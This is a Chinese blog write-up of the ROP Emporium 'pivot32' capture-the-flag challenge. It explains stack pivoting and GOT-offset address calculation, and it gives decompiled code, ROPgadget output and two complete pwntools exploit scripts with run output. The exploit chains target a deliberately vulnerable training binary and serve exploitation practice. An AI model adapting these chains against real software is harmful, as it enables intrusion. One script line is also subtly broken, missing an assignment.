piovt32 ROP Emporium

于 2022-03-30 11:26:02 发布
阅读量455 收藏 1
点赞数
分类专栏: pwn 文章标签: pwn ROP、
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/devil8123665/article/details/123841959
版权

1、栈迁移

由于某些条件限制先栈空间不足写长的ROP,需要把主要的ROP写到其他区域。在可写栈区域写一个短的ROP,完成跳转到长ROP区域,完成最终的代码执行。栈迁移有两种方法,方法一,通过两次 leave ret完成,方法二,通过控制栈顶寄存器esp,使其跳转到长ROP区域。

方法一:

汇编语言leave_ret指令 leave相当于mov esp ebp + pop ebp mov esp ebp操作指将ebp的值赋给esp,也就是让esp指向ebp所指的地方 pop ebp操作指将栈上ebp所指向的内容pop出来

通过填充数据将ebp覆盖成我们想让函数执行流去到的地方(dss/data/堆区) 然后在填入leave_ret 指令 特别注意的是:其实在函数执行到我们填入的leave_ret指令之前,函数内自己也有一段leave_ret 指令,也就是说,我们这个设置栈溢出,leave_ret 指令它执行了两次。 实际上,这里执行了两次的leave_ret过程。第一次函数运行结束后,进行leave的时候,会把ebp丢到堆空间的地方。然后利用第一次ret跳转到leave_ret的gadget的地方再执行一次leave_ret,从而将esp也弄到堆空间的payload_1处。由于每次ret都会使得esp+4,所以,伪造的ebp的地址要减去4。

 

方法二:

需要构造ROP重写esp栈顶寄存器。不需要控制ebp寄存器。

2、查找未调用函数的真实地址

原理,由于plt表与got表的特性,函数第一次调用时plt表指向的got表中存储的执行在plt表中查找函数真实地址的函数地址,查找到函数真实地址后,存储到got表的原来表项中替换掉查找函数的指向地址。以题目为例, foothold_function函数,先调用利用利用plt表中的地址调用一次后,在plot表中会存储其真实地址,利用foothold_function函数与ret2win函数在libpivot32.so的便宜差,通过foothold_function真实地址,计算出ret2win函数的真实地址。

我们可以在pivot32的二进制找到foothold_function的plt和got表项,还可以在libpivot32.so找到ret2win这个函数。

 

##

3、wp

在IDA中分析文件pivot32文件,溢出函数pwnme

int __cdecl pwnme(void *buf)
{
  char s[40]; // [esp+0h] [ebp-28h] BYREF
​
  memset(s, 0, 0x20u);
  puts("Call ret2win() from libpivot");
  printf("The Old Gods kindly bestow upon you a place to pivot: %p\n", buf);
  puts("Send a ROP chain now and it will land there");
  printf("> ");
  read(0, buf, 0x100u);
  puts("Thank you!\n");
  puts("Now please send your stack smash");
  printf("> ");
  read(0, s, 0x38u);
  return puts("Thank you!");
}

发现可写的字符空间为0x38-0x28-0x4(ebp)-0x4(eip)=8,空间太小。

在main函数中创建了一个堆区域,题目为了简单,把堆区的地址进行了输出。

在libpiovt32.so文件中找到ret2win函数如下。

void __noreturn ret2win()
{
  FILE *stream; // [esp+4h] [ebp-34h]
  char s[33]; // [esp+Bh] [ebp-2Dh] BYREF
  unsigned int v2; // [esp+2Ch] [ebp-Ch]
​
  v2 = __readgsdword(0x14u);
  stream = fopen("flag.txt", "r");
  if ( !stream )
  {
    puts("Failed to open file: flag.txt");
    exit(1);
  }
  fgets(s, 33, stream);
  puts(s);
  fclose(stream);
  exit(0);
}
​
​

根据题目提示,在栈区完成栈迁移,在堆区调用ret2win函数。

foothold_function
.got.plt 804A024
.plt    08048520
 call   8048520 <foothold_function@plt>
​
​

题目分析

(1)运行程序得到堆区地址:0xf7dfbf08

The Old Gods kindly bestow upon you a place to pivot: 0xf7dfbf08

(2)read(0, s, 0x38u);函数结束时执行leave ;ret;需要找到,leave;ret;ROP链

(3)获取ret2win真实地址,需要获取foothold_function函数的真实地址,以及在lib中ret2win与foothold_function的偏移量,然后计算,需要pop;mov res [res];addROP

# ROPgadget --binary pivot32 --only "pop|ret|mov|add|call|leave"
Gadgets information
============================================================
0x08048668 : add al, 8 ; add ecx, ecx ; ret
0x080485ee : add al, 8 ; call eax
0x0804863b : add al, 8 ; call edx
0x08048831 : add bl, al ; add eax, ebx ; ret
0x080485ff : add bl, dh ; ret
0x080485fd : add byte ptr [eax], al ; add bl, dh ; ret
0x080485fc : add byte ptr [eax], al ; add byte ptr [eax], al ; ret
0x080484a4 : add byte ptr [eax], al ; add esp, 8 ; pop ebx ; ret
0x080485fe : add byte ptr [eax], al ; ret
0x08048665 : add eax, 0x804a040 ; add ecx, ecx ; ret
0x08048833 : add eax, ebx ; ret
0x0804866a : add ecx, ecx ; ret
0x080485f2 : add esp, 0x10 ; leave ; ret
0x08048895 : add esp, 0xc ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080484a6 : add esp, 8 ; pop ebx ; ret
0x0804857b : call 0x80485a9
0x0804848c : call 0x80485c6
0x080485f0 : call eax
0x0804863d : call edx
0x080485f5 : leave ; ret
0x08048667 : mov al, byte ptr [0xc9010804] ; ret
0x080485ed : mov al, byte ptr [0xd0ff0804] ; add esp, 0x10 ; leave ; ret
0x0804863a : mov al, byte ptr [0xd2ff0804] ; add esp, 0x10 ; leave ; ret
0x08048664 : mov byte ptr [0x804a040], 1 ; leave ; ret
0x08048830 : mov eax, dword ptr [eax] ; ret
0x080485a3 : mov ebx, dword ptr [esp] ; ret
0x080485fa : mov esp, 0x27 ; add bl, dh ; ret
0x0804882c : pop eax ; ret
0x0804889b : pop ebp ; ret
0x08048898 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080484a9 : pop ebx ; ret
0x0804889a : pop edi ; pop ebp ; ret
0x08048899 : pop esi ; pop edi ; pop ebp ; ret
0x080488b0 : pop ss ; add byte ptr [eax], al ; add esp, 8 ; pop ebx ; ret
0x08048492 : ret
0x0804861e : ret 0xeac1
​
Unique gadgets found: 36
​
​
​
栈迁移
0x080485f5 : leave ; ret
leave_ret=0x080485f5
ROP区
​
foothold_function.plt
pop foothold_function.got
mov res [res]
pop osset
add res osset
call res
​
0x0804882c : pop eax ; ret
0x08048830 : mov eax, dword ptr [eax] ; ret
0x080484a9 : pop ebx ; ret
0x08048833 : add eax, ebx ; ret
0x080485f0 : call eax
​
pop_eax=0x0804882c
mov_eax_eax=0x08048830
pop_ebx=0x080484a9
add_eax_ebx=0x08048833
call_eax=0x080485f0

gdb调试

地址
heap_addr= 0xf7dfbf08
​
leave_ret=0x080485f5
​
pop_eax=0x0804882c
mov_eax_eax=0x08048830
pop_ebx=0x080484a9
add_eax_ebx=0x08048833
call_eax=0x080485f0
foothold_plt=0x8048520
foothold_got=0x804a024
offset=503
​
payload1=p32(foothold_plt)
payload1+=p32(pop_eax)
payload1+=p32(foothold_got)
payload1+=p32(mov_eax_eax)
payload1+=p32(pop_ebx)
payload1+=p32(offset)
payload1+=p32(add_eax_ebx)
payload1+=p32(call_eax)
​
​
payload2=b'a'*(0x28)
payload2+=p32(heap_addr-4)
payload2+p32(leave_ret)
​
payload2
set $ebp=0xf7dfbf08-4
set $ebp+4=0x080485f5

方法二中,修改esp到堆区

# ROPgadget --binary pivot32 --only "pop|ret|xchg"
Gadgets information
============================================================
0x0804882c : pop eax ; ret
0x0804889b : pop ebp ; ret
0x08048898 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080484a9 : pop ebx ; ret
0x0804889a : pop edi ; pop ebp ; ret
0x08048899 : pop esi ; pop edi ; pop ebp ; ret
0x08048492 : ret
0x0804861e : ret 0xeac1
0x0804882e : xchg eax, esp ; ret
​
0x0804882c : pop eax ; ret
0x0804882e : xchg eax, esp ; ret
​
pop_eax=0x0804882c
xchg_eax_esp=0x0804882e
​
payload2:
payload2=b'a'*(0x28+4)
payload2+=p32(0x0804882c)
payload2+=p32(heap_addr)
payload2+=p32(xchg_eax_esp)
​
长度:0x28+4+4*3=0x38
​
​

exp

from pwn import *
p=process('./pivot32')
e=ELF('./pivot32')
lib=ELF('./libpivot32.so')
​
heap_addr=0xf7dfbf08
​
leave_ret=0x080485f5
​
pop_eax=0x0804882c
mov_eax_eax=0x08048830
pop_ebx=0x080484a9
add_eax_ebx=0x08048833
call_eax=0x080485f0
xchg_eax_esp=0x0804882e
​
foothold_plt=e.plt['foothold_function']
foothold_got=e.got['foothold_function']
​
offset = int(lib.sym['ret2win']-lib.sym['foothold_function'])
​
print(hex(foothold_plt),hex(foothold_got),offset)
​
#print(p.recv())
recv=p.recv()
heap_addr=int(recv.split()[20],16)
print(recv)
print(hex(heap_addr))
​
payload1=p32(foothold_plt)
payload1+=p32(pop_eax)
payload1+=p32(foothold_got)
payload1+=p32(mov_eax_eax)
payload1+=p32(pop_ebx)
payload1+=p32(offset)
payload1+=p32(add_eax_ebx)
payload1+=p32(call_eax)
​
print("send payload1")
​
p.sendline(payload1)
print(p.recvuntil('>'))
​
#方法一
#payload2=b'a'*(0x28)
#payload2+=p32(heap_addr-4)
#payload2+p32(leave_ret)
​
#方法二
payload2=b'a'*(0x28+4)
payload2+=p32(pop_eax)
payload2+=p32(heap_addr)
payload2+=p32(xchg_eax_esp)
​
print("send payload2")
p.sendline(payload2)
print(p.recv(1024))
print(p.recvall())
​
print("all")
​
​
# python3 pivot32.py 
[+] Starting local process './pivot32': pid 7452
[*] '/home/wdp/Desktop/pwn/rop/pivot32'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
    RUNPATH:  b'.'
[*] '/home/wdp/Desktop/pwn/rop/libpivot32.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
0x8048520 0x804a024 503
b'pivot by ROP Emporium\nx86\n\nCall ret2win() from libpivot\nThe Old Gods kindly bestow upon you a place to pivot: 0xf7d7ef08\nSend a ROP chain now and it will land there\n> '
0xf7d7ef08
send payload1
b'Thank you!\n\nNow please send your stack smash\n>'
send payload2
b' '
[+] Receiving all data: Done (126B)
[*] Process './pivot32' stopped with exit code 0 (pid 7452)
b'Thank you!\nfoothold_function(): Check out my .got.plt entry to gain a foothold into libpivot\nROPE{a_placeholder_32byte_flag!}\n'
all
​

exp

* # coding:utf-8
* from pwn import *
* 
* sh = process('./pivot32')
* elf = ELF('./pivot32')
* 
* libc = ELF('./libpivot32.so')
* 
* foothold_function_got = elf.got['foothold_function']
* foothold_function_plt = elf.plt['foothold_function']
* foothold_function_libc = libc.symbols['foothold_function']
* ret2win_libc = libc.symbols['ret2win']
* 
* sh.recvuntil('pivot: ')
* shellcode_addr = int(sh.recv(10), 16)
* 
* pop_eax_addr = 0x80488c0
* xchg_addr = 0x080488c2
* mov_addr = 0x080488c4
* add_addr = 0x080488c7
* 
* pop_ebx_addr = 0x08048571
* jmp_addr = 0x08048a5f
* 
* payload1 = p32(foothold_function_plt) # 调用foothold_function函数,调用时会将foothold_function函数的实际地址写入到GOT表中
* payload1 += p32(pop_eax_addr) + p32(foothold_function_got)# 将foothold_function函数的GOT地址写入eax寄存器
* payload1 += p32(mov_addr) # 将foothold_function函数的GOT地址指向的地址放入eax寄存器,即foothold_function函数在内存中的真实地址
* payload1 += p32(pop_ebx_addr) + p32(ret2win_libc - foothold_function_libc) # 将ret2win函数与foothold_function函数在libc.so文件中的相对偏移放入ebx
* payload1 += p32(add_addr) # foothold_function函数真实地址加上ret2win相对于foothold_function函数的offset即得ret2win函数在内存中的实际地址
* payload1 += p32(jmp_addr) # 使程序跳转到eax中的地址,即泄露的堆空间的入口位置
* 
* sh.recvuntil('>')
* sh.sendline(payload1)
* 
* payload2 = 'a' * (0x28 + 0x4) # padding
* payload2 += p32(pop_eax_addr) + p32(shellcode_addr) # 堆空间的地址放入eax寄存器
* payload2 += p32(xchg_addr) # 交换eax和esp的值,也就是说程序分配的对空间就被当成栈,交换eax和esp的值,也就是说程序分配的堆空间就被当成栈,ret就会返回到栈顶去执行我们精心设计好的shellcode
* 
* sh.recvuntil('smash')
* sh.sendline(payload2)
* 
* sh.interactive()
* sh.close()

【rop emporium 2020】pivot_破落之实的博客-CSDN博客

ROP Emporium の pivot | ColdSnap の Blog

CTF|rop emporium pivot32 writeup (栈迁移题型)_一个不融化的雪人的博客-CSDN博客

devil8123665
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ROP_Emporium_pivot
Starr
03-27 2170
文章目录1. pivot32信息收集黑盒测试反汇编思路Exp2. pivot反汇编调试分析Exp3. 参考文章 如果esp和ebp能够被控制,那么整个堆栈就可以被控制,甚至被转移。Stack pivoting就是一种栈迁移技术,可以用来绕过NX,或者溢出空间太小的情况。 1. pivot32 信息收集 $ file pivot32 pivot32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, in
CTF-PWN-pivot32ROP+plt+GOT+栈帧转移)
SuperGate的博客
08-20 907
程序概述 首先本程序是一个32位程序,checksec后观察发现只开启了NX。 由于题目中使用了libpivot.so动态链接库,并且重要的得到flag的函数也在libpivot.so函数中,因此考虑用plt和got的映射关系,然后根据函数在.so文件中的偏移来找到cat_flag函数的地址,从而栈溢出控制程序流程。 有一个小问题在于题目中给的栈溢出的缓冲区比较小,很显然无法存下我们所需要的所有R...
CTF|rop emporium pivot32 writeup (栈迁移题型)
skyattractive的博客
06-13 651
CTF|rop emporium pivot32 writeup (栈迁移题型) 题目来源:https://ropemporium.com/challenge/pivot.html malloc生成了一个堆区 pwnme函数里面有两个gets函数,存在栈溢出的地方,在第二个gets,但是他在填充完s之后所剩下的空间位58-0x28-4,是一个很小的空间,在这样的狭小空间里面是不足以构造rop chain的。 stack pivoting 具有这样特点的题目叫做stack pivoting。 stack
rop emporium 2020】write4
^_^
02-06 431
这篇博客主要是关于rop emporium(2020年7月的版本)的ret2win这道题的学习记录 因为网上都是比较早版本的题解,所以写了这篇博客,这道题与之前的版本的区别是没有system函数,但是有另外一个print_file函数来获取flag,所以本质上还是差不多的。 题目链接:https://ropemporium.com/challenge/split.html 备注:以下题目都是在ubuntu16.04下完成 32位 溢出点还是44… 看了下网上给的教程是利用system函数。但是好像网站更.
通过实例学习ROP技术
hl1293348082的专栏
03-27 469
这两天闲着无聊就在 exploit-db 上找个小软件练练手,但是 exploit-db 上面给的 poc 并能正常运行,无奈只好自己写了一个,顺便写篇文章把自己写 shellcode 的思路分享给大家。 软件介绍及环境搭建 漏洞软件:MPlayer 虚拟机:win xp sp3 实验工具:OD 软件下载地址及POC: https://pan.baidu.com/s/1kWdnKkZ 这款软件有点年份了,并且开启了 DEP 保护机制。我们的目的是通过使用 ROP 技术绕过 DEP 并执行
piovt 火柴人制作软件
02-25
piovt火柴人制作,做你想做的动画,可以恶搞,可以动作,可以暴力,可以血腥。
piovt 3 神通汉化版
10-11
pivot 3 火柴人支点线条人物漫画家,可制作各种火柴人闯关、决斗等动画,可保存成GIF图片,欢迎下载
Pivot3神通汉化版
04-11
可以轻松制作火柴人动画,实现你的制作火柴人动画的梦想!!
Qlik-Sense-jquery-pivot-Extension
07-14
Qlik Sense jquery.pivot 扩展简单的枢轴 Qlik Sense 扩展。 扩展使用作为基础。 检查以查看它的运行情况。 默认 jquery.pivot css 和图像用于扩展。 提供了几个选项: 格式 - 数字的自定义格式。...
Nishang2022最新可用版本,稳定
06-28
Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段 ... Piovt:跳板 Prasadhak:对照VirusTotal数据库检查正在进行的进程的运行哈希
ROP技术绕过DEP--MPlayer栈溢出漏洞
weixin_30251587的博客
06-02 443
一、前言 1.1 DEP介绍 数据执行保护 (DEP) 是一套软硬件技术,能够在内存上执行额外检查以防止在不可运行的内存区域上执行代码。 在 Microsoft Windows XP Service Pack 2、 Microsoft Windows Server 2003 Service Pack 1 、 Microsoft Windows XP Tablet PC Edition 2005...
构建ROP链实现远程栈溢出
CSDN
02-21 5032
通常情况下栈溢出可能造成的后果有两种,一类是本地提权另一类则是远程执行任意命令,通常C/C++并没有提供智能化检查用户输入是否合法的功能,同时程序编写人员在编写代码时也很难始终检查栈是否会发生溢出,这就给恶意代码的溢出提供了的条件,利用溢出,攻击者可以控制程序的执行流,从而控制程序的执行过程并实施恶意行为,而微软的DEP保护机制则可使缓冲区溢出失效,不过利用ROP反导技术依然是可被绕过的,接下来...
[网络安全自学篇] 五十五.Windows系统安全之构建ROP链绕过DEP及原理详解
热门推荐
杨秀璋的专栏
03-03 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了基于SEH异常处理机制的栈溢出漏洞,利用一个恶意的请求头部(HEAD或GET)引起缓冲区溢出,从而改写SEH链的地址并反弹Shell。本文将讲解DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,重点利用VirtualProtect,最终编写漏洞利用脚本并实现自动化攻击。基础性文章,希望对您有所帮助。
小白详解rop emporium
BadRer的博客
08-02 2079
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
node-v9.6.0-x86.msi
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
Python基于机器学习的分布式系统故障诊断系统源代码,分布式系统的故障数据进行分析,设计故障诊断模型,高效地分析并识别故障类别
04-29
基于技术手段(包括但不限于机器学习、深度学习等技术)对分布式系统的故障数据进行分析,设计故障诊断模型,高效地分析并识别故障类别,实现分布式系统故障运维的智能化,快速恢复故障的同时大大降低分布式系统运维工作的难度,减少运维对人力资源的消耗。在分布式系统中某个节点发生故障时,故障会沿着分布式系统的拓扑结构进行传播,造成自身节点及其邻接节点相关的KPI指标和发生大量日志异常
JavaScript前端开发的核心语言前端开发的核心语言
最新发布
04-29
javascript 当今互联网时代,JavaScript已经成为了前端开发的核心语言它是一种高级程序设计语言,通常用于网页的交互和动态效果的实现。JavaScript的灵活性以及广泛的使用使得它变得异常重要,能够为用户带来更好的用户体验。 JavaScript的特点之一是它的轻量级,它可以在网页中运行无需单独的编译或下载。这意味着网页可以更快地加载并且用户无需安装额外的软件才能运行网页上的JavaScript代码。此外,与HTML和CSS紧密结合,可以直接在HTML文档中嵌入,使得网页的开发变得非常便捷。 JavaScript具有动态性,它可以在浏览器中实时修改页面内容和样。它可以通过操作DOM(文档对象模型来动态地修改网页的结构和布局,并且可以根据用户的行为实时地响应各种事件,如点击、标悬停、滚动等。这使得开发者可以轻松地为网页添加交互性和动态效果,提供更好的用户体验。 JavaScript也是一种面向对象的语言。它支持对象、类、继承、多态等面向对象编程的概念,使得代码结构更加清晰和可维护。开发者可以创建自定义的对象和方法,对功能进行封装和复用,提高代码的可读性和可维护性。
四则运算自动生成程序安装包
04-29
四则运算自动生成程序安装包
基于Linux的私有文件服务器(网盘).zip
04-29
基于Linux的私有文件服务器(网盘)
源代码-access 管理 系统 API 文件.zip
04-29
源代码-access 管理 系统 API 文件.zip

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值